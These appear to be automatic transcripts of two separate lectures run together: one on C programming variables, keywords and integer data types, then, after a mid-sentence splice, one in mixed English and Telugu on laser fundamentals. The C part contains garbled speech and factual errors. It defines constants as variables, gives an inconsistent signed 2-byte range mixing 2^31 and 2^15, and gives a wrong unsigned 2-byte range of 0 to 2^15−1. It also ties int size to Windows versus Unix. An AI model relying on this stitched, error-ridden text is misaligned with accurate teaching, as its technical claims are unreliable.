allowed. First letter underscore is allowed. Char, it is a keyword, not allowed this. AB45, it is also valid, because as a first letter alphabet, remaining letter may be alphabets, may be digits, no problem. But here 45, it is a digits, here digits it will be started. Now these are the invalid variables, these are the valid variables. Every C programming variables, these are the rules to be followed, based on that rules only to define. That is a discussion about variables. Now I want to discuss keywords, like already I did show that, I mean done is rich already defined. 32 keywords. All C language compiler followed the 32 keywords. These are fixed, you can't change of the keywords. These are also called as reserved words or keywords or built-in words. Built-in words. These are built-in words. Now all C compilers supported these 32 keywords, totally 32 keywords. Every keyword some meaning is there, the meaning already defined. You can't change of the meaning, already defined. But every keyword followed as a case also. Is it keyword is small letter or keyword is capital letter, that should be remember. Mostly C language all keywords are followed by small letters, mostly small letters. Very few keywords are capital letters, mostly all keywords are upper lower case letters, not a uppercase. You see that what are the keywords we have? Keywords are also called as preserved words, which are already declared to the C compiler, already C compiler defined. C has 32 keywords. You have some list of the keywords. Actually these are not only keywords, some more also there. Here I defined only few keywords, many keywords are there. Auto, double, int, struct, break, else, these all are the keyword. These are only few keywords. Totally how many keywords you have? 32 keywords will be there. Mostly used that all keywords every program may be used, may not be used. And see that whenever you learn the keywords, what is the next you want to move off that? Data types. Whenever you learn the keywords, then data types. Now listen, till whatever I discussed, if whenever you start for learning of C language program, what is my first point? ASCII characters to be understand, American characters, that is called as C language character set. After learning of that, what I discussed keywords, just now I completed, which words are already defined by other, those are keywords. 32 keywords are there. And what is one more I discussed, constants. What is meant by constants? Which value cannot changeable, those were called as variables. And one more also I discussed, one more also to use, variable naming rules also I discussed. How many rules are there? 6 rules. Every C programming variable making, those rules to be followed, then only you can develop the C programs. What is one more discussion? Data types. In C language, one more important concept, data types. Data types are there. Actually, what is mean by data? Data called as information. What is mean by data type? Which type of information stored in the variable? I mean which type of value stored in the variable, that is decided by data type. Suppose if I want to store the numbers, integer can be used. If I want to store the characters, character to be used. If I want to store the decimal, float to be used. What is the definition of data type? Which type of information stored in the variables, that is decided by data types. C language data types are basically two types are there, basic data types, derived data types. C language data types are two types, you have basic data types, derived. Basic data types also called as built-in data types, predefined. Derived data types also called as user defined data types, it is a user defined. Basic is built-in, derived types are called as user defined. You see the basic data types, int, float, char,
long double. These are basically predefined or built-in. These are basically under the some more subtypes also there. Actually these are the major types, but under that subdata types also there, subdata types. Which are the derived types? User defined. I mean programmer should be create this, programmer. Like array, array can be defined, array can be create. Structures, it's a user defined. Union, it's also user can be defined or derived. Type def, it is also user can be defined. Finally, what is my conclusion? Data types are two types of data types. C programming language, data types are two categories. First one called as basic types, second one called as derived types. What is meant by basic types? Which data types are already defined by C author create based on the requirement to create the types. Now see, under basic data types, you have some categories. Under basic data types, which are the types are there? Integer, main one is integer data type, character data type, and one more is float data type. These are major. And for the user defined, which are the types are there? Arrays, structures, unions, type def. Those are the user defined data types. Now see, under this basic data types only, subdata types also there. You see that how to work off these data types, it's very important. If you want to work with C language program, data types are most important. How to use of the data types? You see the data types. Suppose if I go for integer type, in C programming language, how to use the integer type? Int. What is the syntax of that? Int. What is meant by int? Int called as integer. It's a keyword, author defined. Variable. Variable means our defined, user defined. It is called as statement. Int is a data type, variable, it's a statement. This statement ended with semicolon. Now you see some example. When I mentioned int serial number is a variable, int is a data type. Serial number is a variable name, our defined. Whenever this variable is integer, I can enter the number 10, it is valid, 10 is valid. If I enter the serial number equal to C, it's a character, don't allow this, it's invalid. If I enter the serial number 10.45, it is also invalid because decimal also invalid. If I enter the minus 10, it's a valid. That means negative value also allowed. Signed, minus indicates signed integer, signed also allowed. When I mention the integer data type, what is the memory occupation of integer? 2 bytes or 4 bytes. Why? Because some operating system like Windows, DOS, you have to use based on the 32-bit or 64-bit 2 bytes. And some data, some operating systems like Unix, Linux, you can take it as 4 bytes. Now you see, if I use the 2 bytes of integer, what is the maximum number can be defined? 2 bytes. 2 bytes means how many bits? 1 byte equal to 8 bits. 1 byte equal to 8 bits. 2 bytes means 32 bits. Sorry, 16 bits. 2 bytes means 16 bits. What is the range of that? Minus 2 power 15, I mean 16 minus 1 plus 2 power 15 minus 1. This is the range, minus 2 power 15 to plus 2 power 15 minus 1. And if I use the 4 bytes, 4 bytes means 32 bits, minus 2 power 31, it's a fixed, 2 plus 2 power 31 minus 1. Finally, integer type means which only can store, numbers only store, digits only store, cannot store the characters and cannot store the symbols. You can't store the characters, you can't store the symbols. Every integer user can allow sign also allow. Now see, what is meant by integer data type? Under basic data types, integer is the first data type.
What is meant by integer data type? It is allowed only numbers or digits. It is not allowed the characters, characters not allowed. It is not allowed the special symbols, only plain numbers allowed. Integer means how much memory occupied, 2 bytes or 4 bytes. Why? Because if you are using with the Windows operating system, 2 bytes. If you are using with the 32-bit or 64-bit, if you are using Unix or Linux, maybe changes of your integer data type memory 4 bytes. If it is 2 bytes, what is the range? 2 bytes means how many bits? 16 bits. 1 byte equal to 8 bits. 2 bytes means 16 bits. What is the range? Minus 2 power 31 2 plus 2 power 15 minus 1. Now this range is a fixed range. In that range only you can enter the numbers. That range is predefined range based on the memory. Now for the integers, allowed only numbers. 2 bytes means minus 2 power 15 2 plus 2 power 15 minus 1. 4 bytes means minus 2 power 31 2 plus 2 power 31 minus 1. Up to that numbers only allowed. More than that not allowed. Is it integer allowed the signed values? Yes, integer allowed the signed values. Negative integer also allowed, positive integer also allowed. Negative sign also allowed, positive sign also allowed. One more type of integer also there, the type of integer called as unsigned integer. Here I am discussing integer, mostly used integer. One more type also there under integer, unsigned integer. What is meant by unsigned integer? Unsigned indicates only for positive values. Whenever you define unsigned keyword, before int unsigned keyword, it is allowed only positive values. There is no negative values. Unsigned integer also how much memory? 2 bytes. 0 number, there is no negative. 0 only to start. 0 to 2 to the power of 15 minus 1. If it is 4 bytes means 0 to 2 to the power of 32 minus 1. Finally, what is the difference of int and unsigned int? Int means positive and negative values. Unsigned means only positive values. Now these are the integer data type I discussed under C language data types. Some more data types in the next session I will continue. In the next session some more data types will be discussed. Thank you for Good afternoon. Today I am going to discuss about lasers. So in this lasers we will be having 3 subtopics. One is laser fundamentals, the other one is different types of lasers which are studying in this semester, and the last one is applications of lasers in various fields. So first of all, what is meant by a laser? Laser is an acronym for an abbreviation, or its abbreviation is light amplification by stimulated emission of radiation. So the total laser stands for light amplification by stimulated emission of radiation. In this there will be 2 processes mainly involved. One is light will be amplified, and the other one is the process which with the light will be amplified is called as stimulated emission. So now we are going to discuss all these topics. He used the photon concept for explaining the photoelectric effect. Based on this photon effect only, the entire lasers was built up. So
the lasers. One is the wave nature and the other one is the particle nature for the light. This is based upon the de Broglie concept, that is every moving particle is always associated with a wave. Next, the first laser is initially called as maser. Maser means microwave amplification by stimulated emission of radiation. This was developed by the scientist named C.H. Townes in 1951. So, in this device, Townes used the ammonia molecules and produced the maser, which is of having wavelength 1 centimeters. So, by using this device, he amplified the microwaves. Next, the first laser was prepared by the scientist named Theodore Maiman in 1960. So, he employed the ruby rod, which is surrounded by a helical xenon flash lamp, and generated a laser beam of wavelength 6943 nanometers, 694.3 nanometers. So, what are the basic concepts of laser? Other one is spontaneous emission, the next one is stimulated emission, and the fourth one is population inversion, and the last one is lasing action. తెలుగులో అబ్జార్ప్షన్ ని శోషణం అంటారు, స్పాంటేనియస్ ఎమిషన్ ని స్వచ్ఛంద ఉద్గారం అంటారు, స్టిమ్యులేటెడ్ ఎమిషన్ ని ఉత్తేజిత ఉద్గారం అంటారు, పాపులేషన్ ఇన్వర్షన్ ని జనాభా విలోమం అంటారు, అదేవిధంగా లేజింగ్ యాక్షన్ ని లేజింగ్ చర్య అంటారు. ఈ 5 చర్యల మీద లేజర్ మొత్తం నిర్మితం అవుతుంది. అందులో ఒక్కొక్క దాని గురించి వివరంగా తెలుసుకుందాం. ఫస్ట్ వన్ ఈజ్ అబ్జార్ప్షన్. In this absorption process, according to electron structure, every atom consists of a centrally surround nucleus in which the positive charge and the entire mass of the atom is supposed to be concentrated. ప్రతి పరమాణువులో మధ్యలో ధనావేశం మరియు మొత్తం పరమాణు యొక్క భారం మొత్తం కలిగిన ఒక ప్రాంతం ఉంటుంది. ఆ ప్రాంతాన్నే కేంద్రకం అంటారు. ఈ కేంద్రకం చుట్టూ వివిధ వృత్తాకార కక్షల్లో ఎలక్ట్రాన్లు పరిభ్రమిస్తూ ఉంటాయి. అరౌండ్ దిస్ న్యూక్లియస్ ద ఎలక్ట్రాన్స్ విల్ బి మూవింగ్ ఇన్ డిఫరెంట్ ఆర్బిట్స్. As long as the electron is moving in that orbit, the total energy of the electron remains constant, which is called as stationary orbit. ఎలక్ట్రాన్ కక్షలో తిరుగుతున్నంతసేపు దాని యొక్క మొత్తం శక్తి స్థిరంగా ఉంటుంది, కనుక ఆ కక్షల్ని స్థిర కక్షలు అంటారు. ఎలక్ట్రాన్ ఒక కక్ష నుంచి ఇంకొక కక్షకి సంక్రమణం జరిపినప్పుడు దాని శక్తిలో మార్పులు వస్తాయి. whenever the electron moves from one state to another state, there will be transitions, there will be changes in the energies. అయితే the highest filled electron orbit is called as its ground state. ఎలక్ట్రాన్లచే ఆవరించబడిన కక్షను, చివరి కక్షను దాని యొక్క భూస్థాయి అంటాము. భూస్థాయికి ఉన్న పైనున్న స్థాయిలో ఎటువంటి ఎలక్ట్రాన్లు ఉండవు, వాటిని ఉత్తేజిత శక్తి స్థాయిలు అంటాము. ద ఎనర్జీ స్టేట్స్ అబౌవ్ ద గ్రౌండ్ స్టేట్ ఆర్ ఆల్మోస్ట్ ఆల్ ఎంప్టీ and there will be no electron present in the excited states normally. Now, on absorption of energy, the electron moves to these excited states. ఎలక్ట్రాన్ శక్తిని శోషించుకున్నప్పుడు అది పైనున్న శక్తి స్థాయిలకి ఉత్తేజితం పొందుతుంది. ఈ పక్కనున్న చిత్రపటంలో ఇన్ దిస్ ఫిగర్ వీ కెన్ క్లియర్లీ అబ్జర్వ్ దట్ అవుట్ ఆఫ్ ద 6 colors that are emitting from the light source, the orange color is absorbed by the electron which is rotating around the nucleus. ఇందులో కనుక మనం పరిశీలించగలిగితే ఈ కేంద్రకం చుట్టూ తిరుగుతున్న ఎలక్ట్రాను దాని మీద పడుతున్న 6 కిరణాల్లో ఆరెంజ్ కలర్ని అది అబ్జార్బ్ చేసుకుని పైనున్న సెకండ్ ఆర్బిట్లోకి ఎంటర్ అవుతుంది. కనుక ఆ అబ్జార్ప్షన్ స్పెక్ట్రంలో మనకి ఆరెంజ్ కలర్ అనేది కనబడదు. అయితే ఈ ఎలక్ట్రాను ఎగ్జైటెడ్ స్టేట్లో వెళ్ళినప్పుడు ఆ శక్తి శోషణం అనేది ఫోటాన్ల రూపంలో జరుగుతుంది. ఎలక్ట్రాను ఉత్తేజిత శక్తి స్థాయిలో కొంత సమయం మాత్రమే గడుపుతుంది. ఈ గడిపే సమయాన్ని దాని యొక్క జీవితకాలం అంటాము. ద టైమ్ స్పెంట్ బై ద ఎలక్ట్రాన్ ఇన్ ద ఎగ్జైటెడ్ స్టేట్ ఈస్ కాల్డ్ యాజ్ ఇట్స్ లైఫ్ టైమ్. ఆ లైఫ్ టైమ్ అనేది తీసుకున్న పరమాణువు మీద డిపెండ్ అవుతుంది. అంటే డిఫరెంట్ మెటీరియల్స్ విల్ బి హ్యావింగ్ డిఫరెంట్ లైఫ్ టైమ్స్. నెక్స్ట్ ఎమిషన్, రెండో ప్రాసెస్. ఎలక్ట్రాన్ హయ్యర్ ఎనర్జీ స్టేట్ నుంచి లోవర్ ఎనర్జీ స్టేట్కు. నెక్స్ట్ ఎమిషన్ విల్ బి ఆఫ్ 2 types. అందులో ఒకటి స్పాంటేనియస్ ఎమిషన్, ఇంకొకటి స్టిమ్యులేటెడ్ ఎమిషన్.
అయితే ఈ అబ్జార్ప్షన్ ఎమిషన్ రెండు కూడా ఈ ఫిగర్లో మనం క్లియర్గా గమనించవచ్చు. ద ఎలక్ట్రాన్ అనేది ఇక్కడ రెండో ఆర్బిట్లో తిరుగుతుంది. దాని మీద పడుతున్న ఎల్లో కలర్ ఎనర్జీలో ఈ ఎలక్ట్రాన్ అనేది ఎనర్జీని అబ్జార్బ్ చేసుకోవడం వల్ల ఒక్కొక్క ఆర్బిట్ చేంజ్ అవుతూ ఆ చివరి ఆర్బిట్లోకి వస్తుంది. దీన్నే మనం శోషణ ప్రక్రియ అంటాము. అదేవిధంగా చివరనున్న ఆర్బిట్ నుంచి ఎలక్ట్రాన్ ఎనర్జీని రిలీజ్ చేసుకుంటూ కిందనున్న లోవర్ ఎనర్జీ ఆర్బిట్స్కి వస్తుంది. ఈ సమయంలో మనకి శక్తి అనేది ఫోటాన్ల రూపంలో బయటికి విడుదలవ్వడాన్ని క్లియర్గా గమనించవచ్చు. సో హియర్ రెడ్ కలర్ ఫోటాన్ విల్ బి ఎమిటెడ్, ఫస్ట్ వన్, నెక్స్ట్ వన్ ఈజ్ గ్రీన్ కలర్ అండ్ ద అదర్ వన్ ఈజ్ బ్లూ కలర్. సో 3 రకాల ఫోటాన్లు ఇక్కడ ఎలక్ట్రాన్ ట్రాన్సిషన్ వల్ల మనకి ఎమిట్ అవుతున్నాయి. నెక్స్ట్ ఎమిషన్ ప్రాసెస్ అనేది 2 టైప్స్. అందులో స్పాంటేనియస్ ఎమిషన్ ఒకటి, ఇంకొకటి స్టిమ్యులేటెడ్ ఎమిషన్. స్పాంటేనియస్ ఎమిషన్లో ఏం జరుగుతుంది? స్పాంటేనియస్ ఎమిషన్ అనేది న్యాచురల్ ప్రాసెస్, అంటే ఎలక్ట్రాన్ దాన్నంతట అది కిందనున్న శక్తి స్థాయిలకు వస్తుంది, న్యాచురల్గా వస్తుంది. ఈ ప్రాసెస్లో ఎలక్ట్రాన్ లాస్ అయిన ఎనర్జీ ఒక సింగిల్ ఫోటాన్ రూపంలో ఎమిట్ అవుతుంది. దీని వాల్యూ ఇంత ఉంటుందని మనం ఖచ్చితంగా నిర్ధారించలేము. సేమ్ లెవెల్లో కొన్ని ఎగ్జైటెడ్ స్టేట్స్లోకి వెళ్ళిన ఎలక్ట్రాను ఆ స్టేట్స్లో చాలా ఎక్కువగా ఉంటుంది. అటువంటి స్టేట్స్ని మనం మెటాస్టేబుల్ స్టేట్స్ అంటాము. ఇక్కడికి వచ్చేసరికి ఇందులో మనం స్పాంటేనియస్ ఎమిషన్ని క్లియర్గా అబ్జర్వ్ చేయొచ్చు. ఇది న్యూక్లియస్. ఈ న్యూక్లియస్ చుట్టూ ఫస్ట్ ఆర్బిట్ అనేది గ్రీన్ ఆర్బిట్, ఈ గ్రీన్ ఆర్బిట్ తర్వాత ఉన్న రెడ్ ఆర్బిట్ ఎగ్జైటెడ్ స్టేట్ ఆఫ్ ద ఎలక్ట్రాను, గ్రీన్ ఆర్బిట్ గ్రౌండ్ స్టేటు. ఎలక్ట్రాన్ అనేది ఈ రెడ్ ఆర్బిట్లో నుంచి అనగా ఎగ్జైటెడ్ స్టేట్లో నుంచి లోవర్ ఎనర్జీ స్టేట్కి వచ్చినప్పుడు ఒక ఫోటాన్ అనేది ఎమిట్ అవుతుంది. ఈ ఫోటాన్కి అనేది ర్యాండమ్ ఫేజ్ ఉంటుంది, అదేవిధంగా దాని యొక్క డైరెక్షన్ కూడా ర్యాండమ్గా ఉంటుంది. నెక్స్ట్ స్టిమ్యులేటెడ్ ఎమిషన్. మెటాస్టేబుల్ స్టేట్స్లోకి వెళ్ళిన ఎలక్ట్రాన్ దాన్నంతట అది ఎలక్ట్రాన్ మీద ఒక ఫోటాన్ అనేది కొలైడ్ అయినప్పుడు ఖచ్చితంగా ఎలక్ట్రాన్ అనేది లోవర్ ఎనర్జీ స్టేట్కి వస్తుంది. అది మనం ఈ ఫిగర్లో క్లియర్గా గమనించవచ్చు. S1 అనేది ఎగ్జైటెడ్ స్టేటు, S0 అనేది మనకి గ్రౌండ్ స్టేటు. S1 స్టేటు అనేది మెటాస్టేబుల్ స్టేట్. ఈ మెటాస్టేబుల్ స్టేట్లో ఉన్న ఒక పార్టికల్ లేదా ఎలక్ట్రాన్ అనేది కిందికి రావాలంటే దాని మీద hν ఎనర్జీ కలిగిన ఈ ఫోటాన్ అనేది ఇన్సిడెంట్ అయితే ఆ ఎలక్ట్రాను ఎనర్జీని లాస్ అవుతూ కిందనున్న S0 స్టేట్కి వస్తుంది. అయితే ఈ లాస్ అయిన ఎనర్జీ ఒక ఫోటాన్ రూపంలో వస్తుంది. అయితే ఇక్కడికి వచ్చేసరికి ఏంటంటే కండిషను, ఈ ఎనర్జీ లాస్ అయినప్పుడు ఫోటాన్కి ఎంతైతే ఎనర్జీ అయితే ఉంటుందో, ఎంత ఫ్రీక్వెన్సీ ఉంటుందో, ఎంత వేవ్ లెంత్ అయితే ఉంటుందో, ఇన్సిడెంట్ ఫోటానికి కూడా సేమ్ ఫ్యాక్టర్స్ ఉండాలి. అనగా ఈ ప్రాసెస్లో మనకి 2 ఫోటాన్స్ వస్తాయి. ఈ ప్రాసెస్లో 2 ఫోటాన్స్ వస్తాయి. ఒక ఫోటాను దాని మీద ఇన్సిడెంట్ అవుతున్న ఫోటాను, ఇంకొకటి ఎనర్జీ లాస్ట్ బై ద ఎలక్ట్రాన్. సో ఈ 2 ఫోటాన్స్కి ఒకే వేవ్ లెంత్ ఉంటుంది. నెక్స్ట్ బోత్ విల్ బీ ట్రావెలింగ్ ఇన్ సేమ్ డైరెక్షన్, రెండు ఒకే డైరెక్షన్లో ట్రావెల్ చేస్తాయి. అలాగే రెండింటి యొక్క ఫేజ్ అనేది ఈక్వల్గా ఉంటుంది. సో ఆ ప్రాసెస్ని మళ్ళీ ఇక్కడ మనం క్లియర్గా అబ్జర్వ్ చేయొచ్చు. ఇందులో ఫస్ట్ వన్, దిస్ ఈజ్ ద ఎలక్ట్రాన్ విచ్ ఈజ్ ఆ ఎలక్ట్రాన్ మీద hν ఎనర్జీ కలిగిన ఒక రెడ్ కలర్ ఫోటాన్ ఇన్సిడెంట్ అయితే ఆ ఎలక్ట్రాన్ ఎనర్జీని కోల్పోతే కిందకు వస్తుంది. ఈ టోటల్ ప్రాసెస్లో 2 ఫోటాన్స్ అనేవి మనకి ఎమిట్ అవుతున్నాయి. సో బిఫోర్ కొలిషన్ ఎలక్ట్రాన్ ఎగ్జైటెడ్ స్టేట్లో ఉంటే, ఆఫ్టర్ కొలిషన్ ఎలక్ట్రాన్ గ్రౌండ్ స్టేట్కి వచ్చింది. కొలిషన్ తర్వాత మనకి 2 ఫోటాన్స్ అనేవి ఎమిట్ అవుతున్నాయి. నెక్స్ట్ స్పాంటేనియస్ అండ్ స్టిమ్యులేటెడ్ ఎమిషన్స్. ఈ రెండు కూడా మనం ఈ ఫిగర్లో క్లియర్గా అబ్జర్వ్ చేయొచ్చు. సో ఇక్కడికి వచ్చేసరికి పైదాన్లో ఈ ఎగ్జైటెడ్ స్టేట్లో ఉన్న ఎలక్ట్రాను న్యాచురల్గా కిందకు వస్తుంది. ఈ సమయంలో ఎమిట్ అయిన ఫోటాన్కి ర్యాండమ్ డైరెక్షన్ ఉంటుంది, అదేవిధంగా ఫేజ్ కూడా ర్యాండమ్గా ఉంటుంది. నెక్స్ట్ కిందనున్న స్టిమ్యులేటెడ్ ఎమిషన్ ఫిగర్లో చూస్తే ఈ ఎగ్జైటెడ్ స్టేట్లో ఉన్న ఎలక్ట్రాన్పై ఒక ఫోటాన్ ఇన్సిడెంట్ అయినప్పుడు ఈ ఫోటాన్తో ఈ ఎలక్ట్రాన్ కొలైడ్ అయ్యి కిందనున్న గ్రౌండ్ స్టేట్కి వస్తుంది. గ్రౌండ్ స్టేట్కి వచ్చినప్పుడు ఈ లాస్ అయిన ఎనర్జీ ఫస్ట్ ఫోటాన్ రూపంలో వస్తే రెండో ఫోటాను ఈ ఇన్సిడెంట్ ఫోటాన్కి అవుతుంది. కనుక రెండింటి మధ్య ఒకే డైరెక్షన్లో ఉంటాయి, రెండు సేమ్ వేవ్ లెంత్ కలిగి ఉంటాయి, అలాగే రెండు కూడా ఒకే ఫేజ్లో ఉంటాయి. దిస్ ప్రాసెస్ ఈజ్ ద స్టిమ్యులేటెడ్ ఎమిషన్. నెక్స్ట్ వన్ ఈజ్ పాపులేషన్ ఇన్వర్షన్. అయితే ఈ పాపులేషన్ ఇన్వర్షన్లో ఏం జరుగుతుంది? జనరల్గా మనకి ఎగ్జైటెడ్ స్టేట్లో ఎలక్ట్రాన్స్ నెంబర్ చాలా తక్కువగా ఉంటుంది. ఎందుకంటే మనం చెప్పుకున్నప్పుడే గ్రౌండ్ స్టేట్ గురించి చెప్పుకున్నాం. ఏంటి? హైయెస్ట్ ఫిల్డ్ ఆర్బిట్ అయితే ఏదైతే ఉందో దాన్ని మనం గ్రౌండ్ స్టేట్ కింద చెప్పుకున్నాం. కనుక గ్రౌండ్ స్టేట్లో ఎక్కువ పార్టికల్స్ లేదా ఎలక్ట్రాన్స్ ఉంటాయి. ఫర్ ఎగ్జాంపుల్ ఇక్కడ 2 స్టేట్స్ తీసుకున్నా, ఒకటి E1 అండ్ ద అదర్ వన్ ఈజ్ E2.
ఇందులో E1లో మనకి ఈ పార్టికల్స్ లేదా ఎలక్ట్రాన్స్ నెంబర్ ఎక్కువగా ఉంది, E2లో ఈ పార్టికల్స్ నెంబరు అస్సలు లేదు లేదా జీరో కింద చెప్పొచ్చు. అయితే ఇక్కడ పార్టికల్స్ అనేవి ఎక్కువగా ఈ స్టేట్లో ఉన్నాయి కాబట్టి ఈ స్టేట్ని మనం గ్రౌండ్ స్టేట్ కింద చెప్తాం. నెక్స్ట్ E2లో ఎటువంటి పార్టికల్స్ లేదా ఎలక్ట్రాన్స్ లేవు కనుక ఇది ఎగ్జైటెడ్ స్టేట్స్. జనరల్గా గ్రౌండ్ స్టేట్లో ఉన్న ఎలక్ట్రాన్స్ నెంబర్ ఎక్కువగా ఉంటుంది కంపేర్డ్ టు ద నెంబర్ ఆఫ్ పార్టికల్స్ ఇన్ ద ఎగ్జైటెడ్ స్టేట్. అయితే అబ్జార్ప్షన్ ప్రాసెస్లో ఏమవుతుందంటే ఈ గ్రౌండ్ స్టేట్లో ఉన్న ఈ పార్టికల్స్ ఎనర్జీని అబ్జార్బ్ చేసుకుని హయ్యర్ ఎనర్జీ స్టేట్ అయినటువంటి E2 స్టేట్లోకి వెళ్తాయి. ఫలితంగా ఈ ఎలక్ట్రాన్స్ లేదా పార్టికల్స్ యొక్క నెంబరు ఎగ్జైటెడ్ స్టేట్లో గ్రాడ్యువల్గా ఇంక్రీజ్ అవుతుంది. సో ఈ ఫిగర్లో మనం గమనిస్తే ఫస్ట్ పార్టికల్ అనేది ఎగ్జైటెడ్ స్టేట్కి వెళ్ళింది, అదేవిధంగా మిగతా పార్టికల్స్ అన్నీ కూడా ఒకదాని తర్వాత ఒకటి ఎనర్జీని అబ్జార్బ్ చేసుకుంటూ హయ్యర్ ఎనర్జీ స్టేట్స్కి వెళ్ళాయి. సో ఏదో ఒక స్టేజ్లో ఎలక్ట్రాన్ అనేది మెటాస్టేబుల్ స్టేట్లోకి ఎంటర్ అవుతే ఆ మెటాస్టేబుల్ స్టేట్లో ఉన్న ఎలక్ట్రాన్ తిరిగి కిందకి రాదు. సో హైయర్ ఎనర్జీ స్టేట్ నుంచి మెటాస్టేబుల్ స్టేట్లోకి వెళ్ళిన ఎలక్ట్రాన్ కిందకి రాదు, కానీ మిగతా స్టేట్స్కి వెళ్ళిన ఎలక్ట్రాన్ కిందకి వచ్చేస్తాయి. సో ఈ మెటాస్టేబుల్ స్టేట్లో ఉన్న ఎలక్ట్రాన్ కిందకి రాకపోవడం వల్ల అక్కడ ఎలక్ట్రాన్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా ఇంక్రీజ్ అవుతుంది. ఫర్ ఎగ్జాంపుల్ ఈ ఫిగర్లో కనుక మనం జాగ్రత్తగా చూడగలిగితే ఈ కింద నుంచి ఎలక్ట్రాన్స్ అన్నీ ఈ స్టేట్కి వెళ్ళి ఈ స్టేట్ నుంచి ఈ కింద స్టేట్కి వచ్చాయి. ఈ కింద స్టేట్ మెటాస్టేబుల్ స్టేట్ కనుక ఇక్కడికి వెళ్ళిన ఎలక్ట్రాను దానంతటది కిందికి రాకపోవడం వల్ల ఇక్కడ ఎలక్ట్రాన్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా ఇంక్రీజ్ అవుతుంది. సో ఏదో ఒకానొక సందర్భంలో మనకి ఈ ఎలక్ట్రాన్స్ యొక్క నెంబరు కిందనున్న గ్రౌండ్ స్టేట్ నెంబర్ కన్నా చాలా ఎక్కువగా ఉంటుంది. అంటే ఫస్ట్ వచ్చిన స్టేట్కి ఇది ఇన్వర్స్ స్టేట్ కాబట్టి దీన్ని మనం పాపులేషన్ ఇన్వర్షన్ అంటాము. సో తెలుగులో దీన్ని జనాభా విలోమము. ఈ ఫిగర్ అయితే మనకి లేజర్లో ఖచ్చితంగా ఈ పాపులేషన్ ఇన్వర్షన్ అచీవ్ అవ్వాలి అంటే పంపింగ్ ప్రాసెస్ అనేది జరగాలి. పంపింగ్ ప్రాసెస్ అంటే ఏంటి? పాపులేషన్ ఇన్వర్షన్ అచీవ్ అవ్వడానికి మనకి కావాల్సిన మెకానిజంనే పంపింగ్ కింద చెప్పొచ్చు. అయితే పంపింగ్ అనేది ఎన్ని రకాలుగా ఉంటుంది? మనకు డిఫరెంట్ టైప్స్ ఆఫ్ పంపింగ్ మెకానిజమ్స్ మనకి డే టు డే లైఫ్లో ఉన్నాయి. అందులో ఫస్ట్ వన్ ఈజ్ ఆప్టికల్ పంపింగ్, రెండోది ఎలక్ట్రికల్ పంపింగ్, మూడోది కెమికల్ పంపింగ్, అండ్ ద లాస్ట్ వన్ ఈజ్ థర్మల్ ఆర్ హీట్ పంపింగ్. సో ఈ పంపింగ్ మెకానిజమ్స్లో జరిగే ప్రక్రియ ఏంటి? ఫస్ట్ ఆప్టికల్ పంపింగ్లో మనం గ్యాషియస్ డిశ్చార్జ్ కానీ లేదా ఫ్లాష్ ట్యూబ్స్ కానీ వాడతాము. ఎగ్జాంపుల్ మనకి ఉన్నది రుబిలైజర్. రెండోది ఎలక్ట్రికల్ డిశ్చార్జెస్ ఉపయోగించి పంపింగ్ ప్రాసెస్ కనుక జరిపితే అది ఎలక్ట్రికల్ పంపింగ్ మెకానిజం కింద వస్తుంది. ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. నెక్స్ట్ థర్డ్ వన్ ఈజ్ కెమికల్ పంపింగ్. ఇందులో మనకి ఎగ్జోథర్మిక్ కెమికల్ రియాక్షన్స్ని మనం వాడతాము. ఈ ఎగ్జోథర్మిక్ కెమికల్ రియాక్షన్స్ వల్ల ఎమిట్ అయిన ఎనర్జీని ఈ పార్టికల్స్ అబ్జార్బ్ చేసుకుని హైయర్ ఎనర్జీ స్టేట్స్కి వెళ్తాయి. కనుక ఇక్కడ పంపింగ్ ప్రాసెస్కి వాడేది కెమికల్ రియాక్షన్స్. అండ్ ద లాస్ట్ వన్ ఈజ్ థర్మల్. ఈ థర్మల్ పంపింగ్ మెకానిజంలో మనం హీట్ ఎనర్జీని ఉపయోగిస్తాము. హీట్ ఎనర్జీని ఉపయోగించడం వల్ల హై టెంపరేచర్స్ వస్తాయి. హై టెంపరేచర్స్ వల్ల ఈ హీట్ ఎనర్జీని పార్టికల్స్ అబ్జార్బ్ చేసుకుని హైయర్ ఎనర్జీ స్టేట్స్లోకి వెళ్తాయి. సో లాస్ట్ ప్రాసెస్ ఇన్ దిస్ లేజర్ ఫండమెంటల్స్ ఆర్ లేజింగ్ యాక్షన్. వాట్ ఈస్ meant by లేజింగ్ యాక్షన్? ఈ పంపింగ్ వల్ల మనకి పాపులేషన్ ఇన్వర్షన్ అనేది అచీవ్ అవుతుంది. ఈ పాపులేషన్ ఇన్వర్షన్ అచీవ్ అవ్వడం వల్ల మనకి ఆటోమేటిక్గా స్పాంటేనియస్ ఎమిషన్ జరిగి ఒక పార్టికల్ దానంతట అది కిందకి వస్తుంది. కిందకి వచ్చినప్పుడు ఒక ఫోటాన్ రిలీజ్ అవుతుంది. ఈ ఫోటాన్ ఇంకొక పార్టికల్ని మెటాస్టేబుల్ స్టేట్లో ఉన్న ఇంకొక పార్టికల్ని స్టిమ్యులేట్ చేసి 2 ఫోటాన్స్ని ఎమిట్ చేస్తుంది. ఈ 2 ఫోటాన్స్ తర్వాత ఉన్న 2 మెటాస్టేబుల్ స్టేట్లో ఉన్న 2 పార్టికల్స్ మీద ఈ 2 ఫోటాన్స్ కొలైడ్ అయ్యి ఇంకొక 2 ఫోటాన్స్ని ఎమిట్ చేస్తాయి. ఫలితంగా మనకి ఈ ప్రాసెస్లో టోటల్ 4 ఫోటాన్స్ వస్తాయి. 2 ఫోటాన్స్ 2 పార్టికల్స్ మీద ఇన్సిడెంట్ అవ్వడం వల్ల ప్రతి ప్రాసెస్లో 2 ఫోటాన్స్ రావడం వల్ల 2 పార్టికల్స్ ఉన్నాయి కనుక 4 ఫోటాన్స్ ఎమిట్ అవుతాయి. ఈ ఫిగర్లో మనం క్లియర్గా మనం అబ్జర్వ్ చేయొచ్చు. ఇందులో రెడ్ కలర్లో ఉన్న ప్రతి కొలిజన్లో నుంచి కూడా మనకి 2 ఫోటాన్స్ వస్తున్నాయి. ఈ 2 ఫోటాన్స్ మిగతా యాటమ్స్ని స్టిమ్యులేట్ చేస్తున్నాయి. కనుక ఈ ప్రాసెస్ చైన్ రియాక్షన్. ఈ చైన్ రియాక్షన్ అలా కంటిన్యూ అవ్వడం వల్ల మనకి గ్రాడ్యువల్గా ఫోటాన్స్ నెంబర్ యొక్క పెరుగుతుంది. ఈ ఫోటాన్స్ నెంబర్ పెరగడం వల్ల అక్కడ లోపల ఉన్న ఫోటాన్ బీమ్ 